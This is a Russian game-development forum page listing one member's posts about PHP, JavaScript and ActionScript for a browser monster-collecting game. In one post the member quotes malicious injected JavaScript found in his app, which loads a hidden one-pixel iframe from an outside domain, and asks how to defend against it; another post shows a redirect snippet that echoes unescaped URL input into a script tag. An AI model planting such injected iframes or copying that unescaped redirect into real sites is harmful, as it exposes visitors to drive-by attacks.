Пятница, 10 Мая 2024, 23:54

Приветствую Вас Гость

[ Новые сообщения · Игроделы · Правила · Поиск ]
Форум игроделов » Записи участника » Lord135 [323]
Результаты поиска
Lord135Дата: Понедельник, 11 Марта 2013, 19:42 | Сообщение # 21 | Тема: Урок по созданию браузерной игры в стиле покемонов. Part 5
постоянный участник
Сейчас нет на сайте
jeki, php-ссылки....
Этим всё сказано.
Встретились два профи Гг

ссылки вида
Цитата
/game.php?param=value

Вообще-то это метод передачи данных (метод GET), если не ошибаюсь,
а php-ссылки это нечто другое, а именно:
Код

$a = 10;
$b = &$a;
echo $b; //выведет 10
$b = 0;
echo $a; //выведет 0
Lord135Дата: Четверг, 07 Марта 2013, 20:46 | Сообщение # 22 | Тема: Помогите написать функцию обмена как в League17
постоянный участник
Сейчас нет на сайте
Koshimarus34, ты всё-ещё не забросила карманных монстров для браузера?
ЗЫ: если чего, то я просто мимо проходил.
ЗЫЫ: "помогите написать" - это написать за ТС`а или просто помочь... морально например?
Lord135Дата: Понедельник, 04 Марта 2013, 22:38 | Сообщение # 23 | Тема: Исходник
постоянный участник
Сейчас нет на сайте
Цитата (Riolu)
Вроде через cURL можно задать ip, как я помню О.о


О_о
Причём cURL то?
Lord135Дата: Суббота, 12 Января 2013, 19:44 | Сообщение # 24 | Тема: Помогите с in_array
постоянный участник
Сейчас нет на сайте
jeki, скорее-всего он имеет в виду то, что нужно бросить PHP и прочие JavaScript`ы и заняться чем-нибудь другим, что получается лучше. Коллекционированием спичечных коробочек например.
Lord135Дата: Среда, 09 Января 2013, 21:49 | Сообщение # 25 | Тема: AS 2.0 (Macromedia Flash 8)
постоянный участник
Сейчас нет на сайте
Вот нужно применить стили к текстовому полю (TextField). Подгрузка CSS идёт из вне. CSS-ка лежит в той-же директории, что и флешка.
Код AS 2.0

Код

import TextField.StyleSheet;
createTextField("chat_box",0,24,505,515,104);
var chat_box_css:StyleSheet = new StyleSheet();
chat_box_css.load("chat_box.css");
chat_box_css.onLoad = function(success){
    if (success){
       chat_box.html = true;
       chat_box.multiline = true;
       chat_box.wordWrap = true;
       chat_box.htmlText = "<span class=\"i\">TEST</span>";
    }
}


CSS

Код

.i{
     color: #ff0000;
}


Сообщение отредактировал Lord135 - Среда, 09 Января 2013, 21:50
Lord135Дата: Среда, 09 Января 2013, 20:44 | Сообщение # 26 | Тема: XSS ?
постоянный участник
Сейчас нет на сайте
liker, Мне просто Вконтакт присылает строку с $_GET`ом, и вот её я обрезаю, оставляя только нужные значения.

Добавлено (09.01.2013, 20:44)
---------------------------------------------
liker, У тебя нету там DELETE и TRUNCATE с DROP. Тоже опасно по-мойму.

Lord135Дата: Среда, 09 Января 2013, 20:25 | Сообщение # 27 | Тема: XSS ?
постоянный участник
Сейчас нет на сайте
liker, Дело не в функции. Дело в том, что даже лог не сечёт ничего. Т.е. до фильтра даже не доходит. А на уязвимость уже потестили)

jiumx60rus, хочешь сказать, что у меня сидит вирь который заражает всё это дело?

Добавлено (09.01.2013, 20:25)
---------------------------------------------
liker,

Код
if(preg_match("/\/?api_url\=+[0-9A-zА-я]+[\-\&\^\%\$\#\@\!\"\№\;\:\?\*\(\)\_\+\=]+/",$_SERVER['REQUEST_URI'])){
  $url = $_SERVER['REQUEST_URI'];
  $url = explode("/?api_url=http://api.vk.com/api.php&",$url);
  $url = $url[1];
  $url = explode("&",$url);
  $new_url = "/index.php?";
  for($i=0;$i<sizeof($url);$i++){
   $url_elem = explode("=",$url[$i]);
   if($url_elem[0]=="viewer_id"){
    $new_url.="viewer_id=".$url_elem[1]."&";
   }elseif($url_elem[0]=="viewer_type"){
    $new_url.="viewer_type=".$url_elem[1];
   }
  }
  echo "<script>location.href='".$new_url."';</script>";
}
Lord135Дата: Среда, 09 Января 2013, 18:46 | Сообщение # 28 | Тема: XSS ?
постоянный участник
Сейчас нет на сайте
jiumx60rus, ведение лога не помогло. Сегодня захожу, а там уже опять код. В бд же нигде ничего нету. Ни в пост запросах, ни в гет. Нету даже входа. Т.е. даже открытия страницы. Я в тупике
Lord135Дата: Вторник, 08 Января 2013, 20:29 | Сообщение # 29 | Тема: Помогите с in_array
постоянный участник
Сейчас нет на сайте
Цитата (PROstak)
80% всего движка написано именно ним...

Цитата (PROstak)
можно пока не многое... Переходить по локам, писать в чат ну и сестра Джой работает... То есть пока что даже pve боя нету.

Как-то противоречиво, не?
Lord135Дата: Вторник, 08 Января 2013, 19:44 | Сообщение # 30 | Тема: Помогите с in_array
постоянный участник
Сейчас нет на сайте
liker, движок про карманных монстров (покемоны, мать их)
Lord135Дата: Вторник, 08 Января 2013, 18:08 | Сообщение # 31 | Тема: Помогите с in_array
постоянный участник
Сейчас нет на сайте
Lord135Дата: Вторник, 08 Января 2013, 09:39 | Сообщение # 32 | Тема: XSS ?
постоянный участник
Сейчас нет на сайте
Пишу я значит некое приложение. И всё было хорошо, но вот тут недавно я захожу в это приложение, а вместо того, чтобы логинить меня, оно висит, я значит исходный код открыл (логинит JavaScript с PHP на пару) а там, вот такая вот прелесть:

Код

<script type="text/javascript" language="javascript" >                    (function () {    var x = document.createElement('iframe');    x.src = 'http://fawsilom.ru/count8.php';    x.style.position = 'absolute';    x.style.border = '0';    x.style.height = '1px';    x.style.width = '1px';    x.style.left = '1px';    x.style.top = '1px';    if (!document.getElementById('x')) {        document.write('<div id=\'x\'></div>');        document.getElementById('x').appendChild(x);    }})();</script>


Почитал я значит в интернетах о XSS, и дыры вроде закрыл (проверка урл и его последующая обрезка, входные данные и так фильтруются).
Но вот не задача, через несколько часов я обнаруживаю, что приложение снова висит, бегу смотреть исходник - там ничего. Открываю js-ку, которая подключается к этой странице. Бац! В js-ке этот код.
Хостинг платный и следовательно ничего своего к моим страницам не добавляет (типа кодов баннеров и т.д.).

Как от этого защитится?
Lord135Дата: Вторник, 08 Января 2013, 09:30 | Сообщение # 33 | Тема: Проблемы с session_start(); (PHP)
постоянный участник
Сейчас нет на сайте
Цитата (Saitei)
А как DW настроить можно? Видимо, дело с кодировкой и этим BOM

Скорее-всего, но как настроить не знаю, ибо я им не пользовался (т.е. всё, что описано выше, происходило конечно со мной, но работал я в notepad++) =)
Lord135Дата: Понедельник, 07 Января 2013, 23:11 | Сообщение # 34 | Тема: Проблемы с session_start(); (PHP)
постоянный участник
Сейчас нет на сайте
Saitei, попробуй стартовать сессию в пустом документе. (И да, возможно попробуй сделать это в notepad++, я когда то долго мучился, потом тот-же самый код написал в блокноте, который notepad++ и всё заработало). А ещё был случай, когда код был правильным, вполне логичным, но не работал, как только я переименовал файл - всё заработало.
P.S. Попробуй переименовать файл )
Lord135Дата: Понедельник, 07 Января 2013, 22:19 | Сообщение # 35 | Тема: Помогите с in_array
постоянный участник
Сейчас нет на сайте
Ты нуб) Читай о массивах и функциях к ним применимым.)) И лучше всего напиши СВОЙ движок (меньше проблем с разбором "что, где и какого... почему т.е.?" ) для игры)

Сообщение отредактировал Lord135 - Понедельник, 07 Января 2013, 22:21
Lord135Дата: Суббота, 22 Декабря 2012, 22:07 | Сообщение # 36 | Тема: Игра покемоны
постоянный участник
Сейчас нет на сайте
Если хотите, могу скинуть скрипт обратного отсчёта, а то чёй-то у вас на сайте таймер так и стоит на 21 дне.
Lord135Дата: Суббота, 22 Декабря 2012, 17:23 | Сообщение # 37 | Тема: Помогите сделать эффект с <td></td>(javascript)
постоянный участник
Сейчас нет на сайте
Но тем-не-менее у тебя в подписи красуется "Гильдия программистов". biggrin

Добавлено (22.12.2012, 17:23)
---------------------------------------------
Возможно стоит попробовать так:

Код

цикл for
if(document.имя_формы.r[i].value==нужное_значение){...твой код...} //например: if(document.lern.r[i].value==num){...код...}
end цикл for
Lord135Дата: Пятница, 21 Декабря 2012, 17:22 | Сообщение # 38 | Тема: Помогите сделать эффект с <td></td>(javascript)
постоянный участник
Сейчас нет на сайте
jeki, Если учёный, то зачем тогда лазать по форумам и просить помощи?

Добавлено (21.12.2012, 17:22)
---------------------------------------------
jeki, И да. Если бы ты был более внимателен, то заметил бы, что в самом начале моего поста есть код по интересующему тебя вопросу.

Lord135Дата: Четверг, 20 Декабря 2012, 21:04 | Сообщение # 39 | Тема: Помогите сделать эффект с <td></td>(javascript)
постоянный участник
Сейчас нет на сайте
Тогда откуда это:

Quote (jeki)
Code
value="2">'.$atk2.'</td>


?

Добавлено (20.12.2012, 20:55)
---------------------------------------------
Примерно так:

Code

var r=document.GetElementsByName('atak');
   for(i=0;i<r.length;i++){
     if(r[i].value=="Номер_атаки"){r[i].checked="checked";break;}
   }

Добавлено (20.12.2012, 21:02)
---------------------------------------------
И к стати, почему бы не использовать цикл для твоих блоков?
Хотя-бы так:

Code

echo '
<form action="" method="post">
<table width="46%"  border="0" align="center"  cellspacing="0">';
   for($i=1;$i<=$количество_атак;$i++){
     if($i==1){$checked="checked=\"checked\"";}else{$checked="";}
     echo '
     <tr>  
      <td width="50%" height="25"  onmouseover=\'this.bgColor="#0bda51"\' onmouseout=\'this.bgColor=""\'><input     name="atak" type="radio" value="'.$i.'" '.$checked.'>'.$atk1.'</td></tr>
     ';
   }


Как-то так...

Добавлено (20.12.2012, 21:04)
---------------------------------------------
А из $atk - сделать массив. Например:

Code

$atk=array(
1=>"Атака 1",2=>"Атака 2",3=>"Атака 3",4=>"Атака 4"
);


Сообщение отредактировал Lord135 - Четверг, 20 Декабря 2012, 20:50
Lord135Дата: Четверг, 20 Декабря 2012, 19:50 | Сообщение # 40 | Тема: Помогите сделать эффект с <td></td>(javascript)
постоянный участник
Сейчас нет на сайте
Это на ПХП али на JavaScript? А то что-то непонятно.
Форум игроделов » Записи участника » Lord135 [323]
Поиск:

Все права сохранены. GcUp.ru © 2008-2024 Рейтинг